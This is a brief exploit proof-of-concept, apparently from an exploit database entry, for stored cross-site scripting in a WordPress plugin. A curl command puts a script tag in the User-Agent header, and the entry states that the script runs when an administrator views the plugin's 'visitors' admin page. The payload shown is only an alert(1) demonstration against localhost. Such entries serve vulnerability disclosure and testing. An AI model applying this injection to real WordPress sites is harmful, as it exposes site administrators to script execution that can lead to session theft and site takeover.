## https://sploitus.com/exploit?id=WPEX-ID:06F1889D-8E2F-481A-B91B-3A8008E00FFC
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>"
The payload will be executed on the "visitors" page within the WordPress admin panel.